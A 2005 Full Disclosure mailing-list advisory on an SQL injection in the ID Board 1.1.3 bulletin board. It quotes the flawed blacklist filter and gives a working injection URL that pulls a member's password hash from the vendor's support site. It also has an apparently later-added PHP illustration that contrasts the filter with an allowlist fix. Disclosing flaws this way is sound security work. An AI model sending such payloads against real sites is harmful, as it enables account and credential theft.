Full Disclosure mailing list archives

ID Board 1.1.3 SQL Injection Vulnerability


From: Defa <defa () systemli org>
Date: Sun, 10 Jul 2005 11:46:57 +0200

============================================================
Title: ID Board 1.1.3 SQL Injection Vulnerability
Vulnerability Discovery: me, myself and I
Date: 09/07/2005
Severity: Remote users can fetch the MD5 password hash.
Affected version: 1.1.3 free (only one tested)
Vendor: http://www.id-team.com/
============================================================

============================================================

* Summary *

ID Board is a small bulletin board system. It is offered in three versions; I could only test the free one. The board is commonly used on German-speaking websites.

-------------------------------------------------------------

* Problem Description *
-----------------------

The bug resides in sql.cls.php - the tbl_suff variable isn't checked.

Vulnerable Code:

// $from is only rejected if it contains one of three case-sensitive substrings;
// anything else is concatenated straight into the table name.
if (!ereg("LEFT JOIN", $from) && !ereg(",", $from) &&
    !ereg("AS", $from))
    $from = "[tbl_prev]".$from."[tbl_suff]";


* Example * (Account required)
------------------------------

http://support.id-team.com/index.php?site=warn&f=1%20WHERE%200=1%20UNION%20SELECT%20mem_pw%20as%20post_topic_name%20FROM%20members%20WHERE%20mem_id=1/*&0&warn=0

-------------------------------------------------------------

* Fix *

Contact the vendor.
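For illustration only (this is not ID Board code or a vendor patch), the blacklist check above rebuilt with preg_match (ereg was removed in PHP 7) next to an allowlist check of the kind that closes the hole; the table names are assumed:

```php
<?php
// Added illustration, not ID Board code: the sql.cls.php blacklist check
// reproduced with preg_match, beside an allowlist check. Table names are
// assumptions; the query shape follows the advisory.

// Vulnerable shape: only three case-sensitive substrings are refused, so a
// lowercase "as", a "WHERE"/"UNION" or a comment marker all pass through.
function build_from_blacklist(string $from): string {
    if (!preg_match('/LEFT JOIN/', $from) && !preg_match('/,/', $from) &&
        !preg_match('/AS/', $from)) {
        $from = "[tbl_prev]" . $from . "[tbl_suff]";
    }
    return $from;
}

// Hardened shape: the table suffix may only be one identifier from a fixed
// allowlist; anything else is refused before it reaches the query string.
const ALLOWED_TABLES = ['members', 'posts', 'topics']; // assumed names

function build_from_allowlist(string $from): string {
    if (!in_array($from, ALLOWED_TABLES, true)) {
        throw new InvalidArgumentException("unknown table: " . $from);
    }
    return "[tbl_prev]" . $from . "[tbl_suff]";
}

// Constructed input: the advisory's f= parameter after URL decoding.
$payload = "1 WHERE 0=1 UNION SELECT mem_pw as post_topic_name"
         . " FROM members WHERE mem_id=1/*";

// Wrapped rather than rejected: "as" is lowercase, and the trailing /*
// comments out the [tbl_suff] that is appended after it.
echo build_from_blacklist($payload), "\n";

try {
    build_from_allowlist($payload);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// A legitimate table name still works with the allowlist.
echo build_from_allowlist('members'), "\n";
```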

-------------------------------------------------------------

* References *

This mail.
-------------------------------------------------------------

* Credits *

no credit.
-------------------------------------------------------------

regards
defa

--
Don't eat yellow snow!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
